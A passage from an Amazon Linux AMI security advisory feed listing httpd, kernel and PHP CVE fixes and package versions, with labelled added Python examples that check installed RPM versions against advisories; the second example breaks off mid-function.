CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects
CVE-2016-2161:
1406753:
CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest
CVE-2016-0736:
1406744:
CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736" title="" id="CVE-2016-0736" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2161" title="" id="CVE-2016-2161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743" title="" id="CVE-2016-8743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.25" release="1.68.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.25-1.68.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.25" release="1.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.25" release="1.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.25" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.25" release="1.68.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/httpd24-tools-2.4.25-1.68.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.25" release="1.68.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.25" release="1.68.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.25-1.68.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.25" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.25-1.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-786</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-786: medium priority package update for kernel</title><issued date="2017-01-19 16:30:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10088:
The sg implementation in the Linux kernel through 4.9 does not properly restrict write operations in situations where the KERNEL_DS option is set, which allows local users to read or write to arbitrary kernel memory locations or cause a denial of service (use-after-free) by leveraging access to a /dev/sg device, related to block/bsg.c and drivers/scsi/sg.c. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-9576.
1412210:
CVE-2016-10088 kernel: Use after free in SCSI generic device interface (CVE-2016-9576 regression)
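ALAS-2017-782 and this advisory ship the same package names at different versions (kernel 4.4.39-34.54.amzn1, then 4.4.41-36.55.amzn1 for the incomplete-fix regression), so checking that "the kernel package is installed" says nothing about whether either advisory is applied: the installed epoch:version-release has to be ordered against each advisory's package entry with RPM's comparison rules. The script below is an added example, not part of this feed and not Amazon's tooling. It parses a constructed, trimmed copy of the two advisories, implements librpm's rpmvercmp ordering (the newer '^' marker is left out), and reports which advisories are still outstanding for a given table of installed packages; that table is constructed input here and would come from rpm -qa on a real host.
<![CDATA[
```python
"""Audit installed RPMs against a yum updateinfo.xml feed (added example, not Amazon tooling)."""
import re
import xml.etree.ElementTree as ET

# Constructed, trimmed copy of ALAS-2017-782 and ALAS-2017-786 from the feed above:
# only the fields this script reads, one x86_64 kernel package each.
SAMPLE_UPDATEINFO = """<updates>
<update status="final" type="security" from="linux-security@amazon.com">
<id>ALAS-2017-782</id><severity>medium</severity>
<references><reference id="CVE-2016-9576" type="cve"/><reference id="CVE-2016-9793" type="cve"/></references>
<pkglist><collection short="amazon-linux-ami">
<package name="kernel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"/>
</collection></pkglist></update>
<update status="final" type="security" from="linux-security@amazon.com">
<id>ALAS-2017-786</id><severity>medium</severity>
<references><reference id="CVE-2016-10088" type="cve"/></references>
<pkglist><collection short="amazon-linux-ami">
<package name="kernel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"/>
</collection></pkglist></update>
</updates>"""

_SIGNIFICANT = re.compile(r"[0-9A-Za-z~]")  # everything else is a separator
_DIGITS, _ALPHA = re.compile(r"[0-9]+"), re.compile(r"[A-Za-z]+")


def rpmvercmp(a: str, b: str) -> int:
    """Order two version or release strings like librpm's rpmvercmp; returns -1, 0 or 1.
    Digit runs compare numerically (leading zeros dropped) and rank above letter runs,
    separators are ignored, and '~' sorts before anything, even the end of the string.
    (The '^' post-release marker of newer librpm is not modelled.)"""
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not _SIGNIFICANT.match(a, i):
            i += 1
        while j < len(b) and not _SIGNIFICANT.match(b, j):
            j += 1
        ca = a[i] if i < len(a) else ""
        cb = b[j] if j < len(b) else ""
        if ca == "~" or cb == "~":  # tilde: 1.0~rc1 is older than 1.0
            if ca != cb:
                return -1 if ca == "~" else 1
            i, j = i + 1, j + 1
            continue
        if not (ca and cb):
            break
        isnum = ca.isdigit()
        pat = _DIGITS if isnum else _ALPHA
        ma, mb = pat.match(a, i), pat.match(b, j)
        if mb is None:  # segment kinds differ; the numeric one is newer
            return 1 if isnum else -1
        sa, sb = ma.group(), mb.group()
        if isnum:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
        i, j = ma.end(), mb.end()
    if i >= len(a) and j >= len(b):
        return 0
    return 1 if i < len(a) else -1


def evrcmp(x, y) -> int:
    """Compare (epoch, version, release) triples; epoch is numeric and defaults to 0."""
    ex, ey = int(x[0] or 0), int(y[0] or 0)
    if ex != ey:
        return 1 if ex > ey else -1
    return rpmvercmp(x[1], y[1]) or rpmvercmp(x[2], y[2])


def parse_updateinfo(xml_text: str):
    """One dict per update element: id, severity, CVE ids, (name, arch) -> (epoch, version, release)."""
    advisories = []
    for upd in ET.fromstring(xml_text).iter("update"):
        pkgs = {(p.get("name"), p.get("arch")): (p.get("epoch"), p.get("version"), p.get("release"))
                for p in upd.iter("package")}
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        advisories.append({"id": upd.findtext("id"), "severity": upd.findtext("severity"),
                           "cves": cves, "packages": pkgs})
    return advisories


def outstanding(advisories, installed):
    """Rows (advisory id, name, arch, installed EVR, fixed EVR) for each installed package that is
    older than what an advisory ships.  installed maps (name, arch) to (epoch, version, release),
    e.g. built from one line per package of: rpm -qa --qf '%{NAME} %{ARCH} %{EPOCHNUM} %{VERSION} %{RELEASE}'
    Packages the host does not have are skipped, as yum does."""
    rows = []
    for adv in advisories:
        for key, fixed in sorted(adv["packages"].items()):
            have = installed.get(key)
            if have is not None and evrcmp(have, fixed) < 0:
                rows.append((adv["id"], key[0], key[1], have, fixed))
    return rows


if __name__ == "__main__":
    # Constructed host state: the ALAS-2017-782 kernel is installed, the ALAS-2017-786 one is not.
    host = {("kernel", "x86_64"): ("0", "4.4.39", "34.54.amzn1")}
    for adv_id, name, arch, have, fixed in outstanding(parse_updateinfo(SAMPLE_UPDATEINFO), host):
        print(f"{adv_id}: {name}.{arch} has {'-'.join(have[1:])}, needs {'-'.join(fixed[1:])}")
```
]]>
On a live host, yum updateinfo list security and yum update --security do this against the real feed; the script is for auditing an image offline or a host whose yum cache is stale. For kernel packages compare the running kernel (uname -r) rather than the newest installed package, because the fixed kernel protects nothing until it is booted.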
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10088" title="" id="CVE-2016-10088" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.41" release="36.55.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.41-36.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.41" release="36.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.41-36.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.41" release="36.55.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.4.41-36.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-787</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-787: medium priority package update for php56</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9935:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.
1404731:
CVE-2016-9935 php: Invalid read when wddx decodes empty boolean element
CVE-2016-9934:
ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.
1404726:
CVE-2016-9934 php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow
CVE-2016-9933:
Stack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP before 5.6.28 and 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value.
1404723:
CVE-2016-9933 php, gd: Stack overflow in gdImageFillToBorder on truecolor images
CVE-2016-9137:
Use-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP before 5.6.27 and 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing.
1391000:
CVE-2016-9137 php: Use after free in unserialize()
CVE-2016-8670:
A vulnerability was found in gd. Integer underflow in a calculation in dynamicGetbuf() was incorrectly handled, leading in some circumstances to an out of bounds write through a very large argument to memcpy(). An attacker could create a crafted image that would lead to a crash or, potentially, code execution.
1391068:
CVE-2016-8670 gd, php: Stack based buffer overflow in dynamicGetbuf
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8670" title="" id="CVE-2016-8670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9137" title="" id="CVE-2016-9137" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9933" title="" id="CVE-2016-9933" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9934" title="" id="CVE-2016-9934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9935" title="" id="CVE-2016-9935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-odbc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.29" release="1.131.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package 
name="php56-imap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.29" release="1.131.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-cli-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.29" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.29-1.131.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.29" release="1.131.amzn1" 
epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.29" 
release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.29-1.131.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.29" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.29-1.131.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-788</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-788: medium priority package update for php70</title><issued date="2017-01-26 18:00:00" /><updated date="2017-01-26 18:00:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9936:
The unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-6834.
1404735:
CVE-2016-9936 php: Use After Free in unserialize()
CVE-2016-9935:
The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.
1404731:
CVE-2016-9935 php: Invalid read when wddx decodes empty boolean element
CVE-2016-9934:
ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.
1404726:
CVE-2016-9934 php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow
CVE-2016-9933:
Stack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP before 5.6.28 and 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value.
1404723:
CVE-2016-9933 php, gd: Stack overflow in gdImageFillToBorder on truecolor images
CVE-2016-9137:
Use-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP before 5.6.27 and 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing.
1391000:
CVE-2016-9137 php: Use after free in unserialize()
CVE-2016-7480:
The SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.
1416499:
CVE-2016-7480 php: Use of uninitialized value in SplObjectStorage::unserialize
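Added example, not part of the Amazon Linux advisory text: a stand-alone Python check that decides whether an installed RPM is at or above the fixed build listed in this update. It re-implements librpm's rpmvercmp (including the tilde and caret segment rules) and compares epoch, version and release in that order, because a plain string comparison gets cases such as release 1.20 versus 1.9 wrong. The advisory table in the code is a hand-copied subset of the php70 x86_64 entries from this update; the installed NEVRA strings in the usage lines are constructed inputs, not output from a real host, and the rpm query format mentioned in a comment assumes an rpm that knows the EPOCHNUM tag.

```python
import re
from collections import namedtuple

NEVRA = namedtuple("NEVRA", "name epoch version release arch")


def _skip_separators(s, k):
    """Advance k past characters rpm ignores: anything that is not ASCII alphanumeric, '~' or '^'."""
    while k != len(s) and not ((s[k] in "~^") or (s[k].isascii() and s[k].isalnum())):
        k += 1
    return k


def rpmvercmp(a, b):
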